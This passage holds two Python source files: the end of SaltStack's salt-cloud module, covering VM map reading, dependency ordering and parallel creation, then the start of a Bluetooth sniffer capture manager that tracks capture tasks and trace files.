"Provisioning": "VM being provisioned in parallel. "
"PID: {0}".format(process.pid)
}
continue
try:
# No need to inject __active_provider_name__ into the context
# here because self.create takes care of that
ret[name] = self.create(vm_)
if not ret[name]:
ret[name] = {"Error": "Failed to deploy VM"}
if len(names) == 1:
raise SaltCloudSystemExit("Failed to deploy VM")
continue
if self.opts.get("show_deploy_args", False) is False:
ret[name].pop("deploy_kwargs", None)
except (SaltCloudSystemExit, SaltCloudConfigError) as exc:
if len(names) == 1:
raise
ret[name] = {"Error": str(exc)}
return ret
def do_action(self, names, kwargs):
"""
Perform an action on a VM which may be specific to this cloud provider
"""
ret = {}
invalid_functions = {}
names = set(names)
for alias, drivers in six.iteritems(self.map_providers_parallel()):
if not names:
break
for driver, vms in six.iteritems(drivers):
if not names:
break
valid_function = True
fun = "{0}.{1}".format(driver, self.opts["action"])
if fun not in self.clouds:
log.info("'%s()' is not available. Not actioning...", fun)
valid_function = False
for vm_name, vm_details in six.iteritems(vms):
if not names:
break
if vm_name not in names:
if not isinstance(vm_details, dict):
vm_details = {}
if "id" in vm_details and vm_details["id"] in names:
vm_name = vm_details["id"]
else:
log.debug(
"vm:%s in provider:%s is not in name " "list:'%s'",
vm_name,
driver,
names,
)
continue
# Build the dictionary of invalid functions with their associated VMs.
if valid_function is False:
if invalid_functions.get(fun) is None:
invalid_functions.update({fun: []})
invalid_functions[fun].append(vm_name)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
if alias not in ret:
ret[alias] = {}
if driver not in ret[alias]:
ret[alias][driver] = {}
# Clean kwargs of "__pub_*" data before running the cloud action call.
# Prevents calling positional "kwarg" arg before "call" when no kwarg
# argument is present in the cloud driver function's arg spec.
kwargs = salt.utils.args.clean_kwargs(**kwargs)
if kwargs:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, kwargs, call="action"
)
else:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, call="action"
)
names.remove(vm_name)
# Set the return information for the VMs listed in the invalid_functions dict.
missing_vms = set()
if invalid_functions:
ret["Invalid Actions"] = invalid_functions
invalid_func_vms = set()
for key, val in six.iteritems(invalid_functions):
invalid_func_vms = invalid_func_vms.union(set(val))
# Find the VMs that are in names, but not in set of invalid functions.
missing_vms = names.difference(invalid_func_vms)
if missing_vms:
ret["Not Found"] = list(missing_vms)
ret["Not Actioned/Not Running"] = list(names)
if not names:
return ret
# Don't return missing VM information for invalid functions until after we've had a
# chance to return successful actions. If a function is valid for one driver, but
# not another, we want to make sure the successful action is returned properly.
if missing_vms:
return ret
# If we reach this point, the Not Actioned and Not Found lists will be the same,
# but we want to list both for clarity/consistency with the invalid functions lists.
ret["Not Actioned/Not Running"] = list(names)
ret["Not Found"] = list(names)
return ret
def do_function(self, prov, func, kwargs):
"""
Perform a function against a cloud provider
"""
matches = self.lookup_providers(prov)
if len(matches) > 1:
raise SaltCloudSystemExit(
"More than one results matched '{0}'. Please specify "
"one of: {1}".format(
prov,
", ".join(
["{0}:{1}".format(alias, driver) for (alias, driver) in matches]
),
)
)
alias, driver = matches.pop()
fun = "{0}.{1}".format(driver, func)
if fun not in self.clouds:
raise SaltCloudSystemExit(
"The '{0}' cloud provider alias, for the '{1}' driver, does "
"not define the function '{2}'".format(alias, driver, func)
)
log.debug("Trying to execute '%s' with the following kwargs: %s", fun, kwargs)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if kwargs:
return {
alias: {driver: self.clouds[fun](call="function", kwargs=kwargs)}
}
return {alias: {driver: self.clouds[fun](call="function")}}
def __filter_non_working_providers(self):
"""
Remove any mis-configured cloud providers from the available listing
"""
for alias, drivers in six.iteritems(self.opts["providers"].copy()):
for driver in drivers.copy():
fun = "{0}.get_configured_provider".format(driver)
if fun not in self.clouds:
# Mis-configured provider that got removed?
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias, could not be loaded. "
"Please check your provider configuration files and "
"ensure all required dependencies are installed "
"for the '%s' driver.\n"
"In rare cases, this could indicate the '%s()' "
"function could not be found.\nRemoving '%s' from "
"the available providers list",
driver,
alias,
driver,
fun,
driver,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if self.clouds[fun]() is False:
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias is not properly "
"configured. Removing it from the available "
"providers list.",
driver,
alias,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
class Map(Cloud):
"""
Create a VM stateful map execution object
"""
def __init__(self, opts):
Cloud.__init__(self, opts)
self.rendered_map = self.read()
def interpolated_map(self, query="list_nodes", cached=False):
rendered_map = self.read().copy()
interpolated_map = {}
for profile, mapped_vms in six.iteritems(rendered_map):
names = set(mapped_vms)
if profile not in self.opts["profiles"]:
if "Errors" not in interpolated_map:
interpolated_map["Errors"] = {}
msg = (
"No provider for the mapped '{0}' profile was found. "
"Skipped VMS: {1}".format(profile, ", ".join(names))
)
log.info(msg)
interpolated_map["Errors"][profile] = msg
continue
matching = self.get_running_by_names(names, query, cached)
for alias, drivers in six.iteritems(matching):
for driver, vms in six.iteritems(drivers):
for vm_name, vm_details in six.iteritems(vms):
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = vm_details
try:
names.remove(vm_name)
except KeyError:
# If it's not there, then our job is already done
pass
if not names:
continue
profile_details = self.opts["profiles"][profile]
alias, driver = profile_details["provider"].split(":")
for vm_name in names:
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = "Absent"
return interpolated_map
def delete_map(self, query=None):
query_map = self.interpolated_map(query=query)
for alias, drivers in six.iteritems(query_map.copy()):
for driver, vms in six.iteritems(drivers.copy()):
for vm_name, vm_details in six.iteritems(vms.copy()):
if vm_details == "Absent":
query_map[alias][driver].pop(vm_name)
if not query_map[alias][driver]:
query_map[alias].pop(driver)
if not query_map[alias]:
query_map.pop(alias)
return query_map
def get_vmnames_by_action(self, action):
query_map = self.interpolated_map("list_nodes")
matching_states = {
"start": ["stopped"],
"stop": ["running", "active"],
"reboot": ["running", "active"],
}
vm_names = []
for alias, drivers in six.iteritems(query_map):
for driver, vms in six.iteritems(drivers):
for vm_name, vm_details in six.iteritems(vms):
# Only certain actions are supported for use in this case. Those actions are the
# "Global" salt-cloud actions defined in the "matching_states" dictionary above.
# If a more specific action is passed in, we shouldn't stack-trace - exit gracefully.
try:
state_action = matching_states[action]
except KeyError:
log.error(
"The use of '%s' as an action is not supported "
"in this context. Only 'start', 'stop', and "
"'reboot' are supported options.",
action,
)
raise SaltCloudException()
if (
vm_details != "Absent"
and vm_details["state"].lower() in state_action
):
vm_names.append(vm_name)
return vm_names
def read(self):
"""
Read in the specified map and return the map structure
"""
map_ = None
if self.opts.get("map", None) is None:
if self.opts.get("map_data", None) is None:
if self.opts.get("map_pillar", None) is None:
pass
elif self.opts.get("map_pillar") not in self.opts.get("maps"):
log.error(
"The specified map not found in pillar at " "'cloud:maps:%s'",
self.opts["map_pillar"],
)
raise SaltCloudNotFound()
else:
# 'map_pillar' is provided, try to use it
map_ = self.opts["maps"][self.opts.get("map_pillar")]
else:
# 'map_data' is provided, try to use it
map_ = self.opts["map_data"]
else:
# 'map' is provided, try to use it
local_minion_opts = copy.deepcopy(self.opts)
local_minion_opts["file_client"] = "local"
self.minion = salt.minion.MasterMinion(local_minion_opts)
if not os.path.isfile(self.opts["map"]):
if not (self.opts["map"]).startswith("salt://"):
log.error(
"The specified map file does not exist: '%s'", self.opts["map"]
)
raise SaltCloudNotFound()
if (self.opts["map"]).startswith("salt://"):
cached_map = self.minion.functions["cp.cache_file"](self.opts["map"])
else:
cached_map = self.opts["map"]
try:
renderer = self.opts.get("renderer", "jinja|yaml")
rend = salt.loader.render(self.opts, {})
blacklist = self.opts.get("renderer_blacklist")
whitelist = self.opts.get("renderer_whitelist")
map_ = compile_template(
cached_map, rend, renderer, blacklist, whitelist
)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Rendering map %s failed, render error:\n%s",
self.opts["map"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {}
if "include" in map_:
map_ = salt.config.include_config(map_, self.opts["map"], verbose=False)
if not map_:
return {}
# Create expected data format if needed
for profile, mapped in six.iteritems(map_.copy()):
if isinstance(mapped, (list, tuple)):
entries = {}
for mapping in mapped:
if isinstance(mapping, six.string_types):
# Foo:
# - bar1
# - bar2
mapping = {mapping: None}
for name, overrides in six.iteritems(mapping):
if overrides is None or isinstance(overrides, bool):
# Foo:
# - bar1:
# - bar2:
overrides = {}
try:
overrides.setdefault("name", name)
except AttributeError:
log.error(
"Cannot use 'name' as a minion id in a cloud map as it "
"is a reserved word. Please change 'name' to a different "
"minion id reference."
)
return {}
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, dict):
# Convert the dictionary mapping to a list of dictionaries
# Foo:
# bar1:
# grains:
# foo: bar
# bar2:
# grains:
# foo: bar
entries = {}
for name, overrides in six.iteritems(mapped):
overrides.setdefault("name", name)
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, six.string_types):
# If it's a single string entry, let's make it iterable because of
# the next step
mapped = [mapped]
map_[profile] = {}
for name in mapped:
map_[profile][name] = {"name": name}
return map_
def _has_loop(self, dmap, seen=None, val=None):
if seen is None:
for values in six.itervalues(dmap["create"]):
seen = []
try:
machines = values["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
else:
if val in seen:
return True
seen.append(val)
try:
machines = dmap["create"][val]["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
return False
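# Note: _has_loop() walks the "requires" edges depth-first, passing along the
# list of machines already seen; meeting one of them again means the map has a
# dependency cycle. Illustrative sketch (hypothetical data, not from the source):
#   dmap = {"create": {"a": {"requires": ["b"]}, "b": {"requires": ["a"]}}}
#   self._has_loop(dmap)  # -> True, because a -> b -> a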
def _calcdep(self, dmap, machine, data, level):
try:
deplist = data["requires"]
except KeyError:
return level
levels = []
for name in deplist:
try:
data = dmap["create"][name]
except KeyError:
try:
data = dmap["existing"][name]
except KeyError:
msg = "Missing dependency in cloud map"
log.error(msg)
raise SaltCloudException(msg)
levels.append(self._calcdep(dmap, name, data, level))
level = max(levels) + 1
return level
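# Note: _calcdep() returns 1 + the longest "requires" chain below a machine, so
# machines with no dependencies end up at level 0 and run_map() can sort the
# create list so dependencies are brought up first. Illustrative sketch
# (hypothetical names): if "web" requires "db" and "db" requires nothing, then
# "db" gets level 0 and "web" gets level 1.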
def map_data(self, cached=False):
"""
Create a data map of what to execute on
"""
ret = {"create": {}}
pmap = self.map_providers_parallel(cached=cached)
exist = set()
defined = set()
rendered_map = copy.deepcopy(self.rendered_map)
for profile_name, nodes in six.iteritems(rendered_map):
if profile_name not in self.opts["profiles"]:
msg = (
"The required profile, '{0}', defined in the map "
"does not exist. The defined nodes, {1}, will not "
"be created.".format(
profile_name, ", ".join("'{0}'".format(node) for node in nodes)
)
)
log.error(msg)
if "errors" not in ret:
ret["errors"] = {}
ret["errors"][profile_name] = msg
continue
profile_data = self.opts["profiles"].get(profile_name)
for nodename, overrides in six.iteritems(nodes):
# Get associated provider data, in case something like size
# or image is specified in the provider file. See issue #32510.
if (
"provider" in overrides
and overrides["provider"] != profile_data["provider"]
):
alias, driver = overrides.get("provider").split(":")
else:
alias, driver = profile_data.get("provider").split(":")
provider_details = copy.deepcopy(self.opts["providers"][alias][driver])
del provider_details["profiles"]
# Update the provider details information with profile data
# Profile data and node overrides should override provider data, if defined.
# This keeps map file data definitions consistent with -p usage.
salt.utils.dictupdate.update(provider_details, profile_data)
nodedata = copy.deepcopy(provider_details)
# Update profile data with the map overrides
for setting in ("grains", "master", "minion", "volumes", "requires"):
deprecated = "map_{0}".format(setting)
if deprecated in overrides:
log.warning(
"The use of '%s' on the '%s' mapping has "
"been deprecated. The preferred way now is to "
"just define '%s'. For now, salt-cloud will do "
"the proper thing and convert the deprecated "
"mapping into the preferred one.",
deprecated,
nodename,
setting,
)
overrides[setting] = overrides.pop(deprecated)
# merge minion grains from map file
if (
"minion" in overrides
and "minion" in nodedata
and "grains" in overrides["minion"]
and "grains" in nodedata["minion"]
):
nodedata["minion"]["grains"].update(overrides["minion"]["grains"])
del overrides["minion"]["grains"]
# remove minion key if now is empty dict
if not overrides["minion"]:
del overrides["minion"]
nodedata = salt.utils.dictupdate.update(nodedata, overrides)
# Add the computed information to the return data
ret["create"][nodename] = nodedata
# Add the node name to the defined set
alias, driver = nodedata["provider"].split(":")
defined.add((alias, driver, nodename))
def get_matching_by_name(name):
matches = {}
for alias, drivers in six.iteritems(pmap):
for driver, vms in six.iteritems(drivers):
for vm_name, details in six.iteritems(vms):
if vm_name == name and driver not in matches:
matches[driver] = details["state"]
return matches
for alias, drivers in six.iteritems(pmap):
for driver, vms in six.iteritems(drivers):
for name, details in six.iteritems(vms):
exist.add((alias, driver, name))
if name not in ret["create"]:
continue
# The machine is set to be created. Does it already exist?
matching = get_matching_by_name(name)
if not matching:
continue
# A machine by the same name exists
for item in matching:
if name not in ret["create"]:
# Machine already removed
break
log.warning(
"'%s' already exists, removing from " "the create map.",
name,
)
if "existing" not in ret:
ret["existing"] = {}
ret["existing"][name] = ret["create"].pop(name)
if "hard" in self.opts and self.opts["hard"]:
if self.opts["enable_hard_maps"] is False:
raise SaltCloudSystemExit(
"The --hard map can be extremely dangerous to use, "
"and therefore must explicitly be enabled in the main "
"configuration file, by setting 'enable_hard_maps' "
"to True"
)
# Hard maps are enabled, Look for the items to delete.
ret["destroy"] = exist.difference(defined)
return ret
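# Note: the dict returned by map_data() always has a "create" key and, when
# applicable, "existing" (machines already present), "errors" (profiles missing
# from the configuration) and, when --hard is enabled, "destroy" (machines that
# exist but are not defined in the map).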
def run_map(self, dmap):
"""
Execute the contents of the VM map
"""
if self._has_loop(dmap):
msg = "Uh-oh, that cloud map has a dependency loop!"
log.error(msg)
raise SaltCloudException(msg)
# Go through the create list and calc dependencies
for key, val in six.iteritems(dmap["create"]):
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["create"][key]["level"] = level
try:
existing_list = six.iteritems(dmap["existing"])
except KeyError:
existing_list = six.iteritems({})
for key, val in existing_list:
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["existing"][key]["level"] = level
# Now sort the create list based on dependencies
create_list = sorted(six.iteritems(dmap["create"]), key=lambda x: x[1]["level"])
output = {}
if self.opts["parallel"]:
parallel_data = []
master_name = None
master_minion_name = None
master_host = None
master_finger = None
try:
master_name, master_profile = next(
(
(name, profile)
for name, profile in create_list
if profile.get("make_master", False) is True
)
)
master_minion_name = master_name
log.debug("Creating new master '%s'", master_name)
if (
salt.config.get_cloud_config_value("deploy", master_profile, self.opts)
is False
):
raise SaltCloudSystemExit(
"Cannot proceed with 'make_master' when salt deployment "
"is disabled(ex: --no-deploy)."
)
# Generate the master keys
log.debug("Generating master keys for '%s'", master_profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", master_profile, self.opts)
)
master_profile["master_pub"] = pub
master_profile["master_pem"] = priv
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_temp_pub = salt.utils.files.mkstemp()
with salt.utils.files.fopen(master_temp_pub, "w") as mtp:
mtp.write(pub)
master_finger = salt.utils.crypt.pem_finger(
master_temp_pub, sum_type=self.opts["hash_type"]
)
os.unlink(master_temp_pub)
if master_profile.get("make_minion", True) is True:
master_profile.setdefault("minion", {})
if "id" in master_profile["minion"]:
master_minion_name = master_profile["minion"]["id"]
# Set this minion's master as local if the user has not set it
if "master" not in master_profile["minion"]:
master_profile["minion"]["master"] = "127.0.0.1"
if master_finger is not None:
master_profile["master_finger"] = master_finger
# Generate the minion keys to pre-seed the master:
for name, profile in create_list:
make_minion = salt.config.get_cloud_config_value(
"make_minion", profile, self.opts, default=True
)
if make_minion is False:
continue
log.debug("Generating minion keys for '%s'", profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", profile, self.opts)
)
profile["pub_key"] = pub
profile["priv_key"] = priv
# Store the minion's public key in order to be pre-seeded in
# the master
master_profile.setdefault("preseed_minion_keys", {})
master_profile["preseed_minion_keys"].update({name: pub})
local_master = False
if (
master_profile["minion"].get("local_master", False)
and master_profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
out = self.create(master_profile, local_master=local_master)
if not isinstance(out, dict):
log.debug(
"Master creation details are not a dictionary: %s", out
)
elif "Errors" in out:
raise SaltCloudSystemExit(
"An error occurred while creating the master, not "
"continuing: {0}".format(out["Errors"])
)
deploy_kwargs = (
self.opts.get("show_deploy_args", False) is True
and
# Get the needed data
out.get("deploy_kwargs", {})
or
# Strip the deploy_kwargs from the returned data since we don't
# want it shown in the console.
out.pop("deploy_kwargs", {})
)
master_host = deploy_kwargs.get(
"salt_host", deploy_kwargs.get("host", None)
)
if master_host is None:
raise SaltCloudSystemExit(
"Host for new master {0} was not found, "
"aborting map".format(master_name)
)
output[master_name] = out
except StopIteration:
log.debug("No make_master found in map")
# Local master?
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_pub = os.path.join(self.opts["pki_dir"], "master.pub")
if os.path.isfile(master_pub):
master_finger = salt.utils.crypt.pem_finger(
master_pub, sum_type=self.opts["hash_type"]
)
opts = self.opts.copy()
if self.opts["parallel"]:
# Force display_ssh_output to be False since the console will
# need to be reset afterwards
log.info(
"Since parallel deployment is in use, ssh console output "
"is disabled. All ssh output will be logged though"
)
opts["display_ssh_output"] = False
local_master = master_name is None
for name, profile in create_list:
if name in (master_name, master_minion_name):
# Already deployed, it's the master's minion
continue
if (
"minion" in profile
and profile["minion"].get("local_master", False)
and profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
if master_finger is not None and local_master is False:
profile["master_finger"] = master_finger
if master_host is not None:
profile.setdefault("minion", {})
profile["minion"].setdefault("master", master_host)
if self.opts["parallel"]:
parallel_data.append(
{
"opts": opts,
"name": name,
"profile": profile,
"local_master": local_master,
}
)
continue
# Not deploying in parallel
try:
output[name] = self.create(profile, local_master=local_master)
if (
self.opts.get("show_deploy_args", False) is False
and "deploy_kwargs" in output
and isinstance(output[name], dict)
):
output[name].pop("deploy_kwargs", None)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
name,
exc,
exc_info_on_loglevel=logging.DEBUG,
)
output[name] = {"Error": str(exc)}
for name in dmap.get("destroy", ()):
output[name] = self.destroy(name)
if self.opts["parallel"] and parallel_data:
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Cloud pool size: %s", pool_size)
output_multip = enter_mainloop(
_create_multiprocessing, parallel_data, pool_size=pool_size
)
# We have deployed in parallel, now do start action in
# correct order based on dependencies.
if self.opts["start_action"]:
actionlist = []
grp = -1
for key, val in groupby(
six.itervalues(dmap["create"]), lambda x: x["level"]
):
actionlist.append([])
grp += 1
for item in val:
actionlist[grp].append(item["name"])
out = {}
for group in actionlist:
log.info(
"Running %s on %s", self.opts["start_action"], ", ".join(group)
)
client = salt.client.get_local_client()
out.update(
client.cmd(
",".join(group),
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
tgt_type="list",
)
)
for obj in output_multip:
next(six.itervalues(obj))["ret"] = out[next(six.iterkeys(obj))]
output.update(obj)
else:
for obj in output_multip:
output.update(obj)
return output
def init_pool_worker():
"""
Make every worker ignore KeyboardInterrupts since they will be handled by the
parent process.
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
def create_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the create is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
cloud = Cloud(parallel_data["opts"])
try:
output = cloud.create(
parallel_data["profile"], local_master=parallel_data["local_master"]
)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
if parallel_data["opts"].get("show_deploy_args", False) is False and isinstance(
output, dict
):
output.pop("deploy_kwargs", None)
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def destroy_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the destroy is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
clouds = salt.loader.clouds(parallel_data["opts"])
try:
fun = clouds["{0}.destroy".format(parallel_data["driver"])]
with salt.utils.context.func_globals_inject(
fun,
__active_provider_name__=":".join(
[parallel_data["alias"], parallel_data["driver"]]
),
):
output = fun(parallel_data["name"])
except SaltCloudException as exc:
log.error(
"Failed to destroy %s. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def run_parallel_map_providers_query(data, queue=None):
"""
This function will be called from another process when building the
providers map.
"""
salt.utils.crypt.reinit_crypto()
cloud = Cloud(data["opts"])
try:
with salt.utils.context.func_globals_inject(
cloud.clouds[data["fun"]],
__active_provider_name__=":".join([data["alias"], data["driver"]]),
):
return (
data["alias"],
data["driver"],
salt.utils.data.simple_types_filter(cloud.clouds[data["fun"]]()),
)
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for running nodes: %s",
data["fun"],
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any nodes
return data["alias"], data["driver"], ()
# For pickle and multiprocessing, we can't use decorators directly
def _run_parallel_map_providers_query(*args, **kw):
return communicator(run_parallel_map_providers_query)(*args[0], **kw)
def _destroy_multiprocessing(*args, **kw):
return communicator(destroy_multiprocessing)(*args[0], **kw)
def _create_multiprocessing(*args, **kw):
return communicator(create_multiprocessing)(*args[0], **kw)
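# Minimal usage note (sketch): enter_mainloop() above hands each pool worker its
# arguments bundled into a single tuple, so these module-level wrappers unpack
# *args[0] before delegating to the communicator()-wrapped worker functions;
# keeping them at module level is also what makes them picklable for
# multiprocessing.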
|
capture_manager.py
|
"""Capture manager for sniffer device."""
from bisect import bisect
import json
import os
import time
from threading import Thread
# Some default values, specific to Ellisys BXE400 in 2011 lab.
# TODO(liuta): create config log for these parameters.
DEFAULT_CAP_DIR = r'C:\Users\tao\bxe400_traces' # Also an FTP base dir
DEFAULT_SPLIT_INTERVAL = 120 # split trace every 2 minutes.
DEFAULT_FTP_LINK = r'ftp://100.96.38.40/'
DEFAULT_CAPTURE_THREAD_CHECK_INTERVAL = 0.1 # Check for new task interval
DEFAULT_HUMAN_READABLE_TIME_FORMAT = '%y-%m-%d %H:%M:%S'
DEFAULT_TASK_SAVE_PATH = (
r'C:\Users\tao\Documents\GitHub\SnifferWebInterface\capture_tasks.json')
def get_capture_filename_by_timestamp(start_time, stop_time):
"""Generate capture filename based on the specified timestamp."""
filename = 'cap-%s-%s.btt' % (
time.strftime('%y%m%d_%H%M%S', time.localtime(start_time)),
time.strftime('%y%m%d_%H%M%S', time.localtime(stop_time)))
return filename
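# Illustrative sketch (hypothetical timestamps): a capture that started at
# 2021-03-01 10:00:00 and stopped at 10:02:00 local time would be named
#   'cap-210301_100000-210301_100200.btt'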
class CaptureTask(object):
"""Data class for capture tasks."""
def __init__(self, task_id, owner, host):
self._task_id = task_id # str, the id of this task
self._start_timestamp = None # Float, epoch time
self._stop_timestamp = None # Float, epoch time
self._owner = owner # str, the owner of this task
self._host = host # str, from which host the task come
self._trace_list = [] # str list, the capture traces of this task.
self._trace_pending = False # bool, True if capture is pending.
def start(self):
self._start_timestamp = time.time()
self._trace_pending = True
def stop(self):
self._stop_timestamp = time.time()
def is_started(self):
return self._start_timestamp is not None
def is_stopped(self):
return self._stop_timestamp is not None
def is_trace_pending(self):
return self._trace_pending
def add_trace(self, trace_path, more_trace=True):
self._trace_list.append(trace_path)
self._trace_pending = more_trace
def to_dict(self, time_format_string=DEFAULT_HUMAN_READABLE_TIME_FORMAT):
"""Convert task to dict for easy serialization."""
res = {}
res['id'] = self._task_id
if self._start_timestamp:
res['start_time'] = time.strftime(
time_format_string, time.localtime(self._start_timestamp))
else:
res['start_time'] = ''
if self._stop_timestamp:
res['stop_time'] = time.strftime(
time_format_string, time.localtime(self._stop_timestamp))
else:
res['stop_time'] = ''
res['owner'] = self._owner
res['host'] = self._host
tmp = []
for p in self._trace_list:
tmp.append(p if DEFAULT_FTP_LINK in p else DEFAULT_FTP_LINK + p)
res['trace_list'] = tmp
res['status'] = self.status
return res
@classmethod
def from_dict(cls, task_dict,
time_format_string=DEFAULT_HUMAN_READABLE_TIME_FORMAT):
"""Convert a dict to task."""
try:
task_id = task_dict['id']
owner = task_dict['owner']
host = task_dict['host']
# Read the string to epoch time.
start_timestamp = time.mktime(
time.strptime(task_dict['start_time'], time_format_string))
stop_timestamp = time.mktime(
time.strptime(task_dict['stop_time'], time_format_string))
if isinstance(task_dict['trace_list'], list):
trace_list = task_dict['trace_list']
else:
raise CaptureTaskException('Invalid trace list.')
pending = False
if task_dict['status'] in ['Running', 'Pending']:
pending = True
task = CaptureTask(task_id, owner, host)
task._start_timestamp = start_timestamp
task._stop_timestamp = stop_timestamp
task._trace_list = trace_list
task._trace_pending = pending
return task
except KeyError as ex:
msg = 'Failed to load task from dict, missing %s' % ex
raise CaptureTaskException(msg)
except ValueError as ex:
msg = 'Failed to parse time: %s.' % ex
raise CaptureTaskException(msg)
@property
def status(self):
"""Returns task status as str.
There are 4 possible statuses:
- Not started: no start time set
- Running: started and not stopped.
- Pending: stopped, waiting for last capture to finish.
- Finished: stopped and all capture is done.
"""
if self._start_timestamp is None:
st = 'Not Started'
elif self._stop_timestamp is None:
st = 'Running'
elif self._trace_pending:
st = 'Pending'
else:
st = 'Finished'
return st
@property
def start_time(self):
return self._start_timestamp
@property
def stop_time(self):
return self._stop_timestamp
@property
def owner(self):
return self._owner
@property
def host(self):
return self._host
@property
def id(self):
return self._task_id
@property
def trace_list(self):
return self._trace_list
class CaptureManager(object):
"""Main class for capture manager."""
def __init__(self, controller,
capture_dir=DEFAULT_CAP_DIR,
split_interval=DEFAULT_SPLIT_INTERVAL):
"""Create the manager object and start the capture thread.
Args:
controller: (BaseSniffer) Sniffer controller.
capture_dir: (string) The capture directory
split_interval: (float) the time interval before each split
"""
self._controller = controller
self._is_capturing = False
self._shutdown = False
self._capture_dir = capture_dir
self._split_interval = split_interval # for temporary override
self._running_tasks = [] # running capture task list
self._pending_tasks = [] # stopped tasks waiting for last capture to finish
self._finished_tasks = [] # finished capture task list
self._task_id_map = {} # A dict of task id -> task for task lookup.
# Sorted list of captured trace's (start epoch time, filename).
self._trace_file_list = []
# Start the capture thread
self._capture_thread = Thread(target=self._capture_thread_func)
self._capture_thread.daemon = True # thread dies with the program
self._capture_thread.start()
self._capture_start_time = 0
# Load previous captures
self._load_tasks_from_disk()
def _capture_thread_func(self):
"""Thread function for capture management."""
print('Capture thread started.')
while not self._shutdown:
# Running state change
if self._has_running_tasks():
# state change: idle -> capture
if not self._is_capturing:
if self._controller.start_capture():
self._is_capturing = True
self._capture_start_time = time.time()
print(time.strftime('CaptureThread: start capture @ %x %X.'))
else:
print('Capture thread: failed to start capture (%s).' %
self._controller.model)
# split trace based on interval
if self._should_split():
self._split_capture()
print(time.strftime('CaptureThread: split capture @ %x %X.'))
else:
# No running task, stop capture if necessary.
if self._is_capturing:
# state change: capture -> idle
self._stop_capture()
print(time.strftime('CaptureThread: stop capture @ %x %X.'))
time.sleep(DEFAULT_CAPTURE_THREAD_CHECK_INTERVAL)
# Capture thread will shutdown. Stop capture and close the controller.
if self._is_capturing:
# state change: capture -> shutdown
self._stop_capture()
print(time.strftime('CaptureThread: shutdown capture @ %x %X.'))
print('Capture thread shutdown.')
def _stop_capture(self):
"""Stop the capture with necessary bookkeeping."""
trace_path = get_capture_filename_by_timestamp(
self._capture_start_time, time.time())
real_path = os.path.join(self._capture_dir, trace_path)
print('CaptureManager: stopping capture, trace path %s' % real_path)
self._controller.stop_capture(real_path)
trace_stop_time = time.time()
trace_start_time = self._capture_start_time
self._trace_file_list.append((trace_start_time,
trace_stop_time,
trace_path))
self._previous_start_time = 0
self._is_capturing = False
self._add_trace_to_tasks(trace_path)
def _split_capture(self):
"""Split capture."""
trace_path = get_capture_filename_by_timestamp(
self._capture_start_time, time.time())
real_path = os.path.join(self._capture_dir, trace_path)
print('CaptureManager: splitting capture, trace path %s' % real_path)
self._controller.split_capture(real_path)
trace_start_time = self._capture_start_time
trace_stop_time = time.time()
self._capture_start_time = trace_stop_time
self._trace_file_list.append((trace_start_time,
trace_stop_time,
trace_path))
self._add_trace_to_tasks(trace_path)
def _add_trace_to_tasks(self, trace_path):
"""Add trace to running task and move finished task to the finished list."""
for task in self._running_tasks:
